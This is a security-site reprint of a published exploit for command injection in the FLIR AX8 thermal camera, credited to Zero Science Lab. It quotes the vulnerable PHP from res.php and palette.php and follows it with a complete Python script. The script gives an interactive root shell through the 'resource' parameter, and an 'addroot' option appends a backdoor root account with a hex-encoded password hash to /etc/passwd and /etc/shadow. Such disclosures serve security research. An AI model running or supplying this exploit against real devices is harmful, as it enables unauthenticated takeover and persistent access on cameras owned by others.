首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
来源:https://www.zeroscience.mk 作者:LiquidWorm 发布时间:2018-10-16  
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
 
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
 
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2.   if (isset($_POST["action"])) {
# 3.     switch ($_POST["action"]) {
# 4.       case "get":
# 5.         if(isset($_POST["resource"]))
# 6.         {
# 7.           switch ($_POST["resource"]) {
# 8.             case ".rtp.hflip":
# 9.               if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10.                $result = "false";
# 11.                break;
# 12.              }
# 13.              $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14.              break;
# 15.            case ".rtp.vflip":
# 16.              if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17.                $result = "false";
# 18.                break;
# 19.              }
# 20.              $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21.              break;
# 22.            default:
# 23.              $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24.          }
# 25.        }
 
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2.   if(isset($_POST["palette"])){
# 3.     shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4.     echo json_encode(array("success"));
# 5.   }
# 6. ?>
 
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######
 
piton = os.path.basename(sys.argv[0])
 
if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
    sys.exit()
 
bannah = """
.---------------------------------.
|         1984 Pictures           |
|                                 |
|            presents             |
|                  ___            |
|                [|   |=|{)__     |
|                 |___| \/   )    |
|                  /|\      /|    |
|                 / | \     | \\   |
.---------------------------------.
"""
print bannah
time.sleep(4)
os.system('clear')
 
print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'
 
ICU = '''
                ````````               
           `./+ooosoooooo+/.`          
        `.+ss+//:::::::://+ss+.`       
       -oyo/::::-------:::::/oyo-      
     `/yo+:::-------.------:::+oy/`    
    `+yo+::---...........----:/+oy+`   
   `/yo++/--...../+oo+:....---:/+oy/`  
   `ss++//:-.../yhhhhhhy/...-://++ss`  
   .ho++/::--.-yhhddddhhy-.--:://+oh.  
   .ho+//::---/mmmmmmmmmm:---::/++oh.  
   `ss++//::---+mNNNNNNm+---:://++ss`  
   `/yo+//:::----+syys+-----://++oy/`  
    `+yo++//:::-----------:://++oy+`   
     `/yo++///:::::-:::::://+++oy/`    
       .oyo+++////////////+++oyo.      
        `.+ssoo++++++++++ooss+.`       
           `./+osssssssso+/.`          
                ````````               
'''
 
colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]
 
print(''.join(colored_chars))
 
print
print '\x1b[1;37;44m'+'To freeze the stream run:   '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'
 
print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'
 
while True:
 
    zeTargets = 'http://'+sys.argv[1]+'/res.php'
    zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
    zeHeaders = {'Cache-Control'   : 'max-age=0',
                 'User-Agent'      : 'thricer/251.4ev4h',
                 'Accept'          : 'text/html,application/xhtml+xml',
                 'Accept-Encoding' : 'gzip, deflate',
                 'Accept-Language' : 'mk-MK,mk;q=1.7',
                 'Connection'      : 'close',
                 'Connection-Type' : 'application/x-www-form-urlencoded'}
    zePardata = {'action'          : 'get',
                 'resource'        : ';'+zeCommand}
 
    try:
 
        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        print json.loads(zeRequest.text)
 
        if zeCommand.strip() == 'exit':
            sys.exit()
 
        if zeCommand.strip() == 'addroot':
            print '[+] Blind command injection using palette.php...'
            print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
 
            nuTargets = 'http://'+sys.argv[1]+'/palette.php'
            nuHeaders = zeHeaders
 
            nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
                         '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
                         '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
                         '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
                         '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
                         '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
                         '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
                         '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
                         '\\x3a\\x3a\\x0a\\x0d')
 
            nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
            nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
 
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
            time.sleep(2)
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
            
            print '[*] Success!\n'
        else: pass
 
    except Exception:
        print '[*] Error!'
        break
 
sys.exit()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Snes9K 0.0.9z - Buffer Overflo
·FLIR Brickstream 3D+ - RTSP St
·Solaris RSH Stack Clash Privil
·NoMachine 5.3.26 Remote Code E
·FluxBB < 1.5.6 - SQL Injection
·Phoenix Contact WebVisit 29857
·Phoenix Contact WebVisit 6.40.
·Microsoft SQL Server Managemen
·Microsoft SQL Server Managemen
·Microsoft SQL Server Managemen
·VLC Media Player 2.2.8 MKV Use
·DELL EMC OneFS Storage Adminis
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved